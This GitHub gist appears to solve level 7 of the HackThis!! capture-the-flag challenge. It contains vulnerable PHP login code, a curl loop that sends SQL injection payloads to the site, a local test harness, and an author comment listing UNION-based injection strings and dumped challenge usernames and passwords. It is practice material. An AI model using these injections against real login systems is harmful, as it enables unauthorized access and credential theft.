Skip to content

Instantly share code, notes, and snippets.

@evandrix

evandrix/index.html

Last active December 10, 2015 19:08
Show Gist options
  • Save evandrix/4479553 to your computer and use it in GitHub Desktop.
Save evandrix/4479553 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
index.html
<!DOCTYPE HTML>
<html lang = "en">
<head>
<title>HackThis!! - Capture the Flag</title>
<meta charset = "UTF-8" />
<link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="/ctf/css/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
</head>
<body>
<div class='level_title'>
Level 7 </div>
<div class='nav'>
<a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a>
</div>
<div class='level_container'>
<form autocomplete="off" method="POST">
<input type="text" name="user" data-holder="Username"/><br/>
<input type="password" name="pass" data-holder="Password"/><br/>
<input type="submit" class="submit" value="Login"/>
</form>
<a href='#' class='view'>View Details</a>
</div>
<div class='level_code'>
<a href='#' class='close'>[X]</a>
<div class='code'>
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">if&nbsp;(isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">]))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$id&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">]);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sqlite_escape_string</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">]);<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"SELECT&nbsp;id,&nbsp;username&nbsp;FROM&nbsp;users<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WHERE&nbsp;password='</span><span style="color: #007700">{</span><span style="color: #0000BB">$pass</span><span style="color: #007700">}</span><span style="color: #DD0000">'&nbsp;AND&nbsp;id=</span><span style="color: #007700">{</span><span style="color: #0000BB">$id</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;LIMIT&nbsp;1"</span><span style="color: #007700">;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">fetch</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"SELECT&nbsp;id,&nbsp;level&nbsp;FROM&nbsp;priv&nbsp;WHERE&nbsp;id&nbsp;=&nbsp;'</span><span style="color: #007700">{</span><span style="color: #0000BB">$id</span><span style="color: #007700">}</span><span style="color: #DD0000">'<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AND&nbsp;level&nbsp;&gt;&nbsp;0&nbsp;LIMIT&nbsp;1"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$result2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$db</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #0000BB">$query</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">$result2&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$result2</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">numRows</span><span style="color: #007700">()&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$admin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$admin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">}<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code> </div>
</div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-34026704-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="/ctf/js/main.js"></script>
</body>
</html>
Raw
index.php
<?php
// ...
if (isset($_POST['user']) && isset($_POST['pass'])) {
$id = sqlite_escape_string($_POST['user']);
$pass = sqlite_escape_string($_POST['pass']);
$query = "SELECT id, username FROM users
WHERE password='{$pass}' AND id={$id} LIMIT 1";
if ($result = $db->query($query)) {
$user = $db->fetch();
// ...
$query = "SELECT id, level FROM priv WHERE id = '{$id}'
AND level > 0 LIMIT 1";
$result2 = $db->query($query);
if ($result2 && $result2->numRows() > 0) {
$admin = true;
} else {
$admin = false;
}
// ...
} else {
// ...
}
}
?>
Raw
index.sh
for i in $(seq 1000 1006); do
MSG=$(curl -s -b cookies.txt -d "user=$i or id=$i" -d "pass=''" http://www.hackthis.co.uk/ctf/7 | egrep -i "(invalid|not|completed)")
echo "$i:$MSG"
done
Raw
level7.php
<?php
// curl -d "user=***" -d "pass=***" -c cookies.txt http://www.hackthis.co.uk/ctf/
// curl -s -b cookies.txt -d "user=$i" -d "pass='secret'" http://www.hackthis.co.uk/ctf/7
$user = $argv[1];
$pass = '';//$argv[2];
$db = mysql_connect("127.0.0.1","root","");
if (!$db)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db("test", $db);
if (isset($user) && isset($pass)) {
$id = sqlite_escape_string($user);
$pass = sqlite_escape_string($pass);
echo $id . "#" . $pass . "\n";
$query = "SELECT id, username FROM users
WHERE password='{$pass}' AND id={$id} LIMIT 1";
echo $query . "\n";
$result = mysql_query($query);
while($row = mysql_fetch_array($result))
{
print_r($row);
$query = "SELECT id, level FROM priv WHERE id = '{$id}'
AND level > 0 LIMIT 1";
echo $query . "\n";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
print_r($row);
}
exit();
/*
if ($result = $db->mysql_query($query)) {
$user = $db->fetch();
$query = "SELECT id, level FROM priv WHERE id = '{$id}'
AND level > 0 LIMIT 1";
$result2 = $db->query($query);
if ($result2 && $result2->numRows() > 0) {
$admin = true;
echo "admin = true";
} else {
$admin = false;
echo "admin = false";
}
} else {
}
*/
}
mysql_close($db);
?>
@evandrix
Copy link
Author

evandrix commented Jan 8, 2013

id
1 or id=1006--
password
1 union select id,password as username from users where id=1006--

1000: walsh / pass
1001: blunden / meow
1002: AJulie / Ware21£Rsd
1003: bew8re / ;oog£!!
1004: overlord / lovelove
1005: sheperd / b00b1es
1006: user / asdfg

username field: userid, ie. 1005
password field: password, ie. b00b1es

@prisonbreak
Copy link

Hi evandrix,

Which is correctly username/password for level 7?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment